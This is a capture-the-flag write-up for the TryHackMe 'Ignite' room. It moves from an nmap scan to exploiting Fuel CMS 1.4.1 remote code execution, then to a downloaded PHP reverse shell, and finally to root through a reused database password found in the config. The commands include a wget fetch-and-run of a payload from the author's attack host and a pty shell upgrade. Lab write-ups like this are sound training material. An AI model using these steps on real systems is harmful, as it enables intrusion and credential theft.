WriteUp — THM Ignite

A new start-up has a few issues with their web server.

This is a writeup for TryHackMe Ignite room.

Start with nmap:

nmap -sC -sV -p- 10.10.67.163 
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–13 10:47 EEST
Nmap scan report for 10.10.67.163
Host is up (0.055s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS

Let’s take a look at robots.txt:

User-agent: *
Disallow: /fuel/

Let’s take a look at that directory. It reveals a login screen to the CMS.

Quick web search finds a vulnerability in the version 1.4: https://www.exploit-db.com/exploits/47138 and we seem to have the exploit already available:

searchsploit fuel cms 

Fuel CMS 1.4.7 — ‘col’ SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 — ‘fuel_replace_id’ SQL Injection (Authenticated) | php/webapps/48778.txt
fuelCMS 1.4.1 — Remote Code Execution | linux/webapps/47138.py

Let’s take a look at the vulnerability CVE-2018–16763. to figure out how it works. Need to modify the script a bit to support Python3, got some environment issues with Python2.

Ok, lets grab a remote shell from https://github.com/pentestmonkey/php-reverse-shell . Modify to point to my attack box. Serve it with Python -m SimpleHTTPServerand upload it to the box using the Python program cmds:

wget http://10.8.108.247:8000/php-reverse-shell.php
php php-reverse-shell.php

And we are in. Upgrade the shell to proper terminal using

python -c 'import pty; pty.spawn("/bin/bash")'

grab the user flag from /home/www.data:

cat flag.txt
__REDACTED__

Browse around the file system. Grab mysql credentials from Fuel CMS configs:

$db[‘default’] = array(
 ‘dsn’ => ‘’,
 ‘hostname’ => ‘localhost’,
 ‘username’ => ‘root’,
 ‘password’ => ‘__REDACTED__’,
 ‘database’ => ‘fuel_schema’,
 ‘dbdriver’ => ‘mysqli’,
 ‘dbprefix’ => ‘’,
 ‘pconnect’ => FALSE,
 ‘db_debug’ => (ENVIRONMENT !== ‘production’),
 ‘cache_on’ => FALSE,
 ‘cachedir’ => ‘’,
 ‘char_set’ => ‘utf8’,
 ‘dbcollat’ => ‘utf8_general_ci’,
 ‘swap_pre’ => ‘’,
 ‘encrypt’ => FALSE,
 ‘compress’ => FALSE,
 ‘stricton’ => FALSE,
 ‘failover’ => array(),
 ‘save_queries’ => TRUE
);

This can’t possibly be the root password. Or can it?

su
Password: __REDACTED__
whoami
root
cat /root/root.txt
__REDACTED__